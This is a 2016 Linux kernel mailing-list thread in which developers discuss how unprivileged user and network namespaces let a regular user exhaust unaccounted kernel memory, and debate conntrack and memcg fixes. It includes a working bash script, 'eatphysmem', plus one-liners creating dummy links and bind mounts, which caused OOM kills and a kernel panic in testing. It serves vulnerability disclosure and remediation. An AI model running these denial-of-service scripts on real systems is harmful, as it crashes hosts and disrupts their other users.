* [q] userns, netns, and quick physical memory consumption by unprivileged user
From: Yuriy M. Kaminskiy @ 2016-03-02 20:38 UTC (permalink / raw)
To: netdev
While looking at 759c01142a5d0f364a462346168a56de28a80f52, I remembered the
infamous
nf_conntrack: falling back to vmalloc
message, which was often triggered by network namespace creation (the
message was removed recently, but that changed nothing about the
underlying problem).
So, how about something like this:
$ cat << 'EOF' > eatphysmem
#!/bin/bash -xe
fd=6
d="`mktemp -d /tmp/eatmemXXXXXXXXX`"
cd "$d"
rule="iptables -A INPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT"
# rule="$rule;$rule"
# ... just because we can; same with any number of ip ro/ru/etc
while :; do
#for i in {1..1024}; do
let fd=fd+1
if [ -e /proc/$$/fd/$fd ]; then continue;fi
mkfifo f1 f2
unshare -rn sh -xec "echo foo >f1;ip li se lo up; $rule;read r <f2" &
pid=$!
read r <f1
eval "exec $fd</proc/$pid/ns/net"
echo bar >f2
wait
rm f2 f1
sleep 1s
done
sleep inf
EOF
$ chmod a+x eatphysmem; unshare -rpf --mount-proc ./eatphysmem
?
You can easily eat 0.5M of physical memory per netns (the conntrack hash
table alone takes hashsize*sizeof(list_head)), and more, and pin it all
to a single process holding the netns fds open.
What can stop it?
ulimit? What is ulimit? Conntrack knows nothing about it.
Ah-yeah, `ulimit -n`? 64k. 64k*512k = 32G. Per process. Oh-uh.
OOM killer? But this memory is not charged to this process; if anything,
it will be killed last.
(I wonder whether memcg can tackle it; probably yes, but how many people
have it configured?)
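The arithmetic above can be sketched in shell. The bucket count and the
per-bucket size below are assumptions, chosen only to reproduce the ~0.5M
figure; they are not read from any kernel. On a live system the bucket
count is normally visible in /sys/module/nf_conntrack/parameters/hashsize.

```shell
#!/bin/sh
# Sketch only: estimate memory pinned by per-netns conntrack hash tables.
# hashsize and bucket_bytes are ASSUMED values picked to match the ~0.5M
# per-netns figure; they are not measured.

# bytes used by one hash table: bucket count * bytes per bucket head
table_bytes() {
    echo $(( $1 * $2 ))
}

# bytes pinned when one process holds $2 netns fds open, $1 bytes each
pinned_bytes() {
    echo $(( $1 * $2 ))
}

hashsize=65536        # assumed bucket count
bucket_bytes=8        # assumed size of one bucket head
max_fds=65536         # the "64k" from `ulimit -n`

per_netns=$(table_bytes "$hashsize" "$bucket_bytes")
total=$(pinned_bytes "$per_netns" "$max_fds")

echo "per netns:   $(( per_netns / 1024 )) KiB"
echo "per process: $(( total / 1024 / 1024 / 1024 )) GiB"
```

With these assumed inputs the result is 512 KiB per netns and 32 GiB per
process, matching the 64k*512k estimate.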
* Re: userns, netns, and quick physical memory consumption by unprivileged user
From: Yuriy M. Kaminskiy @ 2016-03-11 15:06 UTC (permalink / raw)
To: netdev; +Cc: containers, linux-kernel
ping (+ more test results at bottom)
On Wed, 02 Mar 2016, I wrote:
> While looking at CVE-2016-2847, I remembered the infamous
> nf_conntrack: falling back to vmalloc
> message, which was often triggered by network namespace creation (the
> message was removed recently, but that changed nothing about the
> underlying problem).
>
> So, how about something like this:
>
> $ cat << 'EOF' > eatphysmem
> #!/bin/bash -xe
> fd=6
> d="`mktemp -d /tmp/eatmemXXXXXXXXX`"
> cd "$d"
> rule="iptables -A INPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT"
> # rule="$rule;$rule"
> # ... just because we can; same with any number of ip li/ro/ru/etc
> while :; do
> let fd=fd+1
> [ ! -e /proc/$$/fd/$fd ] || continue
> mkfifo f1 f2
> unshare -rn sh -xec "echo foo >f1;ip li se lo up; $rule;read r <f2" &
> pid=$!
> read r <f1
> eval "exec $fd</proc/$pid/ns/net"
> echo bar >f2
> wait
> rm f2 f1
> free
> sleep 0.1s
> done
> sleep inf
> EOF
> $ chmod a+x eatphysmem; unshare -rpf --mount-proc ./eatphysmem
> ?
>
> You can easily eat 0.5M of physical memory per netns (the conntrack hash
> table alone takes hashsize*sizeof(list_head)), and more, and pin it all
> to a single process holding the netns fds open.
> What can stop it?
> ulimit? What is ulimit? Conntrack knows nothing about it.
> Ah-yeah, `ulimit -n`? 64k. 64k*512k = 32G. Per process. Oh-uh.
> OOM killer? But this memory is not charged to this process; if anything,
> it will be killed last.
> (I wonder whether memcg can tackle it; probably yes, but how many people
> have it configured?)
I tested in a VM with kernel 4.4.2 (from a user account, with ulimit
-v 32768); as expected, it quickly ate all memory, the OOM killer went
berserk and killed even systemd-journald and systemd-udevd, but left
this process alive (and hogging all physical memory; also note that
swap was enabled and remained mostly unused).
I also tried with memcg:
t=/sys/fs/cgroup/memory/test1;mkdir $t;echo 0 >$t/tasks;
echo 48M >$t/memory.limit_in_bytes; su testuser [...]
and it did not help at all (rather the opposite: it ended with init
killed and a kernel panic; well, the latter is pure (un)luck, but the
point is that memcg apparently *CANNOT* curb net/ns allocations).
BTW, all those hash/conntrack/etc default sizes were calculated from
physical memory size on the assumption that there would be only *one*
instance of those tables. Obviously, the introduction of network
namespaces (and especially unprivileged user-ns) threw this assumption
out the window (and here comes that "falling back to vmalloc" message
again; in the pre-netns world, those tables were allocated *once* at
early system startup, typically with plenty of free and unfragmented
memory).
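To put a rough number on the "one instance" assumption, a sketch like the
following counts the distinct network namespaces visible under /proc and
multiplies by a per-table size. The 512 KiB per table is an assumed input
taken from the estimate earlier in this thread, and the function names
are hypothetical. Namespaces pinned only by an open fd (as in the script
above) are not counted, because no process lives in them.

```shell
#!/bin/sh
# Sketch only: how much memory N copies of a table "sized for one
# instance" would take. The per-table size is an ASSUMED input.

# count distinct network namespaces visible under a /proc-like directory
# (default /proc); entries we may not read are silently skipped
count_netns() {
    for link in "${1:-/proc}"/[0-9]*/ns/net; do
        readlink "$link" 2>/dev/null
    done | sort -u | wc -l | tr -d ' '
}

# total KiB for $1 namespaces with one table of $2 KiB each
tables_kib() {
    echo $(( $1 * $2 ))
}

n=$(count_netns)
echo "netns visible: $n; tables: $(tables_kib "$n" 512) KiB (assuming 512 KiB each)"
```

Run as root to see namespaces owned by other users; as a regular user
the count is only a lower bound.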
* Re: userns, netns, and quick physical memory consumption by unprivileged user
From: Florian Westphal @ 2016-03-11 15:34 UTC (permalink / raw)
To: Yuriy M. Kaminskiy; +Cc: netdev, containers, linux-kernel
Yuriy M. Kaminskiy <yumkam@gmail.com> wrote:
> BTW, all those hash/conntrack/etc default sizes were calculated from
> physical memory size on the assumption that there would be only *one*
> instance of those tables. Obviously, the introduction of network
> namespaces (and especially unprivileged user-ns) threw this assumption
> out the window (and here comes that "falling back to vmalloc" message
> again; in the pre-netns world, those tables were allocated *once* at
> early system startup, typically with plenty of free and unfragmented
> memory).
No idea how to fix this except by removing conntrack support in net
namespaces completely.
I'd disallow all write accesses to skb->nfct (NAT, CONNMARK,
CONNSECMARK, ...) and then no longer clear skb->nfct when forwarding
packet from init_ns to container.
Containers could then still test conntrack as seen from init namespace pov
in PREROUTING/FORWARD/INPUT (but not OUTPUT, obviously).
[ OUTPUT *might* be doable as well by allowing NEW creation in output
but skipping nat and deferring the confirmation/commit of the new
entry to the table until skb leaves initns ]
We could key conntrack entries to initns conntrack table
instead of adding one new table per netns, but seems like this only
replaces one problem with a new one (filling/blocking initns table from
another netns).
Maybe we could go with a compromise and skip/disallow conntrack in
unpriv userns only?
* Re: userns, netns, and quick physical memory consumption by unprivileged user
From: Pablo Neira Ayuso @ 2016-03-12 11:41 UTC (permalink / raw)
To: Florian Westphal
Cc: Yuriy M. Kaminskiy, netdev, containers, linux-kernel,
netfilter-devel
On Fri, Mar 11, 2016 at 04:34:06PM +0100, Florian Westphal wrote:
> Yuriy M. Kaminskiy <yumkam@gmail.com> wrote:
> > BTW, all those hash/conntrack/etc default sizes were calculated from
> > physical memory size on the assumption that there would be only *one*
> > instance of those tables. Obviously, the introduction of network
> > namespaces (and especially unprivileged user-ns) threw this assumption
> > out the window (and here comes that "falling back to vmalloc" message
> > again; in the pre-netns world, those tables were allocated *once* at
> > early system startup, typically with plenty of free and unfragmented
> > memory).
>
> No idea how to fix this except by removing conntrack support in net
> namespaces completely.
>
> I'd disallow all write accesses to skb->nfct (NAT, CONNMARK,
> CONNSECMARK, ...) and then no longer clear skb->nfct when forwarding
> packet from init_ns to container.
>
> Containers could then still test conntrack as seen from init namespace pov
> in PREROUTING/FORWARD/INPUT (but not OUTPUT, obviously).
>
> [ OUTPUT *might* be doable as well by allowing NEW creation in output
> but skipping nat and deferring the confirmation/commit of the new
> entry to the table until skb leaves initns ]
>
> We could key conntrack entries to initns conntrack table
> instead of adding one new table per netns, but seems like this only
> replaces one problem with a new one (filling/blocking initns table from
> another netns).
We can add a global per-netns limit on the number of conntrack entries
that can only be set with CAP_NET_ADMIN from the initns. That way we
avoid the filling/blocking from another netns; alternatively, hide this
knob from unprivileged userns somehow.
At the previous netfilter workshop, I remember we agreed on going
towards having a single conntrack table for netns, so I suggest we
follow that direction.
* Re: userns, netns, and quick physical memory consumption by unprivileged user
From: Yuriy M. Kaminskiy @ 2016-03-12 13:35 UTC (permalink / raw)
To: netdev; +Cc: linux-kernel, containers
On 03/11/16 18:34 , Florian Westphal wrote:
> Yuriy M. Kaminskiy <yumkam@gmail.com> wrote:
>> BTW, all those hash/conntrack/etc default sizes were calculated from
>> physical memory size on the assumption that there would be only *one*
>> instance of those tables. Obviously, the introduction of network
>> namespaces (and especially unprivileged user-ns) threw this assumption
>> out the window (and here comes that "falling back to vmalloc" message
>> again; in the pre-netns world, those tables were allocated *once* at
>> early system startup, typically with plenty of free and unfragmented
>> memory).
>
> No idea how to fix this except by removing conntrack support in net
> namespaces completely.
Well, it is not *only* conntrack. Conntrack eats big chunks at once, but
there are other things that eat kernel memory too: *any* iptables
rules, 'ip address', 'ip link' (at the very least, 'type dummy' and
/dev/net/tun are available inside an unprivileged userns/netns), 'ip
tunnel', 'ip rule', 'ip route', etc.
Just add *a lot* of them (and over several netns to avoid potential
O(n^2) behaviour on adding), and it will be painful, regardless of
memcg/ulimits/free swap/etc.
E.g. something like
unshare -rn sh -c 'setsid sleep inf & for i in $(seq 1 1024); do
ip li add d$i type dummy; ip li set d$i up;done'
eats ~40M of kernel memory per instance (unswappable and not curbed by
memcg); that's way more than the conntrack hashtables alone.
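One way to observe growth of this kind is to compare a /proc/meminfo
field before and after running the workload. The sketch below uses
SUnreclaim (unreclaimable slab); that is only part of kernel memory, so
it should be read as a lower bound, not as the ~40M measurement itself.
The helper names are hypothetical.

```shell
#!/bin/sh
# Sketch only: watch one /proc/meminfo field around a workload.

# print the value (in kB) of field $1 from a meminfo-style file
# (default /proc/meminfo)
meminfo_kb() {
    awk -v key="$1:" '$1 == key { print $2 }' "${2:-/proc/meminfo}"
}

# difference between two kB readings: after ($2) minus before ($1)
delta_kb() {
    echo $(( $2 - $1 ))
}

before=$(meminfo_kb SUnreclaim)
# ... run the workload under test here ...
after=$(meminfo_kb SUnreclaim)
echo "SUnreclaim grew by $(delta_kb "${before:-0}" "${after:-0}") kB"
```

Other fields such as Slab, VmallocUsed or Percpu can be passed the same
way, where the running kernel exports them.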
At the *very minimum*, all of that must be limited by memcg (it currently
is not!). And maybe by ulimits too (of the process that created the
userns? Well, the natural choice of RLIMIT_MEMLOCK practically forbids
netns; no chance it will fit in 64k).
Specifically for conntrack, separate limits on hash size/entries for
non-initns wouldn't hurt, but that's more "flexibility to avoid
senseless waste of memory" (in case a specific container won't use many
connections or won't use conntrack at all) than protection against abuse.
By the way, there is unrestrained kernel memory consumption in *other*
namespace types too. E.g., let's look at the mount namespace; it looks
like tmpfs contents are at least curbed by memcg [but *not* curbed by
ulimits!], however the *mounts themselves* are not; e.g.
unshare -rm sh -c 'while :; do seq -f /tmp/foo%g 1 1024|
while read d; do mkdir -p $d; mount --bind $d $d;done;done'
is a bit slower [try with several instances?], but the end result
would be the same.
> I'd disallow all write accesses to skb->nfct (NAT, CONNMARK,
> CONNSECMARK, ...) and then no longer clear skb->nfct when forwarding
> packet from init_ns to container.
>
> Containers could then still test conntrack as seen from init namespace pov
> in PREROUTING/FORWARD/INPUT (but not OUTPUT, obviously).
>
> [ OUTPUT *might* be doable as well by allowing NEW creation in output
> but skipping nat and deferring the confirmation/commit of the new
> entry to the table until skb leaves initns ]
>
> We could key conntrack entries to initns conntrack table
> instead of adding one new table per netns, but seems like this only
> replaces one problem with a new one (filling/blocking initns table from
> another netns).
>
> Maybe we could go with a compromise and skip/disallow conntrack in
> unpriv userns only?
* Re: userns, netns, and quick physical memory consumption by unprivileged user
From: Michal Hocko @ 2016-03-14 9:14 UTC (permalink / raw)
To: Yuriy M. Kaminskiy; +Cc: linux-kernel, netdev, containers
On Fri 11-03-16 18:06:59, Yuriy M. Kaminskiy wrote:
[...]
> And also tried with memcg:
> t=/sys/fs/cgroup/memory/test1;mkdir $t;echo 0 >$t/tasks;
> echo 48M >$t/memory.limit_in_bytes; su testuser [...]
> and it did not help at all (rather the opposite: it ended with init
> killed and a kernel panic; well, the latter is pure (un)luck, but the
> point is that memcg apparently *CANNOT* curb net/ns allocations).
It seems you were using memcg v1 here. This didn't have the kernel
memory accounting enabled by default. With v2 you get both user and
kernel (well, some subset of it) accounting enabled. Whether we also
account netns-related data structures sufficiently is a question. I haven't
checked. But it would be worth trying and fixing.
--
Michal Hocko
SUSE Labs
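Which memcg version a test actually ran under can be checked from the
mount table. The sketch below assumes the usual /proc/mounts layout, in
which the third field is the filesystem type ("cgroup" for v1 hierarchies,
"cgroup2" for the v2 unified hierarchy); the function name is
hypothetical.

```shell
#!/bin/sh
# Sketch only: report which cgroup hierarchy types appear in a
# mounts-style file (default /proc/mounts). Field 3 is the fs type.
cgroup_versions() {
    awk '$3 == "cgroup"  { v1 = 1 }
         $3 == "cgroup2" { v2 = 1 }
         END {
             if (v1 && v2) print "v1+v2"
             else if (v2)  print "v2"
             else if (v1)  print "v1"
             else          print "none"
         }' "${1:-/proc/mounts}"
}

echo "cgroup hierarchies mounted: $(cgroup_versions)"
```

A path such as /sys/fs/cgroup/memory/test1 with memory.limit_in_bytes,
as used in the test quoted above, belongs to a v1 hierarchy.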
* Re: userns, netns, and quick physical memory consumption by unprivileged user
From: Yuriy M. Kaminskiy @ 2016-03-14 15:12 UTC (permalink / raw)
To: netdev; +Cc: linux-kernel, containers
On 03/14/16 12:14 , Michal Hocko wrote:
> On Fri 11-03-16 18:06:59, Yuriy M. Kaminskiy wrote:
> [...]
>> And also tried with memcg:
>> t=/sys/fs/cgroup/memory/test1;mkdir $t;echo 0 >$t/tasks;
>> echo 48M >$t/memory.limit_in_bytes; su testuser [...]
>> and it did not help at all (rather the opposite: it ended with init
>> killed and a kernel panic; well, the latter is pure (un)luck, but the
>> point is that memcg apparently *CANNOT* curb net/ns allocations).
>
> It seems you were using memcg v1 here. This didn't have the kernel
> memory accounting enabled by default. With the v2 you get both user and
Hrr. Indeed. And I used a (distro) kernel compiled without MEMCG_KMEM, so
this test was useless. (However, as the distro kernel lacks MEMCG_KMEM,
most users won't be able to use it either[*], so unprivileged userns are
unsafe for all of them and should be disabled.)
That said, I'm not sure it would have helped in kernels <= 4.4 (would
those allocations be made in a context that allows them to be
accounted to the [correct] memcg?), and it looks like with the upcoming
change to whitelisting (explicit __GFP_ACCOUNT) it won't (as almost
nothing in net/* uses it).
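Whether a given kernel was built with the option can be checked against
its config file. This is a sketch: the /boot/config-$(uname -r) location
is an assumption that holds on many distros but not all, the function
name is hypothetical, and option names change between kernel versions,
so "unset" may also mean the option no longer exists under that name.

```shell
#!/bin/sh
# Sketch only: report how a kernel config file sets an option.
# Prints the value after "=" (e.g. "y" or "m"), or "unset" if the
# option is absent, commented out, or the file cannot be read.
config_option() {
    val=$(grep "^$1=" "$2" 2>/dev/null | head -n 1 | cut -d= -f2)
    echo "${val:-unset}"
}

cfg="/boot/config-$(uname -r)"   # assumed location; distro-dependent
echo "CONFIG_MEMCG_KMEM: $(config_option CONFIG_MEMCG_KMEM "$cfg")"
```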
> kernel (well some subset of it) accounting enabled. Whether we account
> also netns related data structures sufficiently is a question. I haven't
Except for the conntrack tables, it is not exactly tied to netns; these
are regular CAP_NET_ADMIN things (routing, addresses, links, iptables,
etc., which can be added via netlink messages). It is just that
userns+netns gives a regular user the right to tweak them.
> checked. But it would be worth trying and fixing.